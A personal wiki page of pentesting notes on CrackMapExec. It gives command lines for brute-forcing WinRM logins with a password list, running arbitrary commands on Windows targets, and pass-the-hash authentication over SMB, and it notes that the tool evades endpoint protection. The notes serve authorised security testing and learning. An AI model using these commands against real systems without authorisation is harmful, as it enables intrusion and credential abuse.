The gMan nixWiki

Because the mind is made of Teflon...

User Tools

Site Tools

You are here: start » cme
cme

Table of Contents

CrackMapExec (CME)

CrackMapExec: “A swiss army knife for pentesting networks…”

  • CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.
  • Built with stealth in mind, CME follows the concept of “Living off the Land”: abusing built-in Active Directory features/protocols to achieve it’s functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.
  • See the documentation for other help and examples.

Supported Protocols: WinRM, MSSQL, SMB, SSH

For help and syntax, just issue the command: crackmapexec or… 

crackmapexec -h
crackmapexec winrm -h # (for help specific to the winrm protocol)
crackmapexec smb -h   # (for help specific to the smb protocol)

General Syntax: 

crackmapexec <protocol> <target(s)> -u username -p password

Examples: 

crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@' # or...
crackmapexec <protocol> <target(s)> -u='username' -p='Admin!123@'

CME & WinRM

Syntax: 

crackmapexec winrm [target ip] -u administrator -p /usr/share/.../unix_passwords.txt

You can use the -u switch to specify a file of possible user names to try.

  • But, if we can get into the admin account, we don't have to do priv esc (so we test with one username, “administrator,” first).
  • You should get a green “[+]” if successful.

Look over the output (from the top down):

  • First line: you can see it actually connects to WinRM.
  • NOTE: wsman is an implementation of WinRM: windows management.

Execute Commands: If you successfully found login credentials, you can crackmapexec to execute arbitrary Windows commands on the target machine. Syntax: 

crackmapexec winrm [target ip] -u administrator -p [password]-x "whoami"
crackmapexec winrm [target ip] -u administrator -p [password] -x "systeminfo"

You should get some happy feedback along with the results of your command execution.

  • systeminfo (Windows) takes a while to run but provides a lot of information about your target system.

CME & Pass-the-Hash

crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]"

This should indicated whether or not it works.

  • If you get a green [+] and (Pwn3d!) then it works and you can try the execution of commands on the system…
crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]" -x "ipconfig"

It should give you visual feedback about the command execution. And there you go. Execute what you want.

cme.txt · Last modified: 2024/02/04 02:08 by gman